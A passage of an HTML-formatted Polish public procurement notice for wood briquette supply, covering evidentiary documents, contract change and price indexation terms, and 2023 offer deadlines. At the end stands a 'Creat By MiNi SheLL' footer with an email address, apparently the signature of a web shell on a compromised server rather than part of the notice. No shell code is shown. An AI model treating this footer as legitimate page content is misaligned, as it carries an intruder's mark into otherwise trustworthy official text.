podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. W zakresie podpisywania i poświadczania mają zastosowanie zapisy rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/> 3. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający nie będzie wzywał Wykonawcy do ich złożenia lub uzupełnienia.<br/> 4. Zamawiający, na podstawie art. 107 ust. 4 ustawy, może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Przewiduje się możliwość dokonania zmian postanowień umowy w zakresie: <br/> a) ilości brykietu drzewnego - w przypadku niekorzystnych warunków pogodowych, w szczególności bardzo niskich temperatur i związanego z tym zwiększonego zużycia brykietu,<br/> b) miejsca składowania brykietu - w przypadku braku miejsca w punkcie składowania określonym w § 3 niniejszej umowy,<br/> c) Zamawiający przewiduje waloryzacje: poprzez zmianę ceny zamówienia, zarówno jej wzrost jak i obniżenie z użyciem odesłania do ogłaszanego w komunikacie Prezesa GUS wskaźnik zmian cen. lub wskazania innej podstawy prawnej w szczególności wykazu rodzajów produktów lub kosztów w przypadku gdy zmiana ceny uprawnia strony do żądania zmiany wynagrodzenia. Pierwsza waloryzacja ceny może nastąpić po okresie 60 dni od dnia otwarcia ofert. Strony ustalają , że w przypadku zaistnienia okoliczności mających wpływ na zmianę wynagrodzenia. Wykonawca może wystąpić do Zamawiającego w terminie 30 dni od daty wprowadzenia zmiany z wnioskiem o zmianę cen jednostkowych poszczególnych artykułów przedkładając odpowiednie dokumenty potwierdzające zasadność złożenia takiego wniosku. Wykonawca powinien wykazać ponad wszelką wątpliwość, że zaistniała zmiana ma bezpośredni wpływ na koszty wykonania zamówienia, oraz określić stopień w jakim wpłynie ona na wysokość wynagrodzenia . <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-01 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com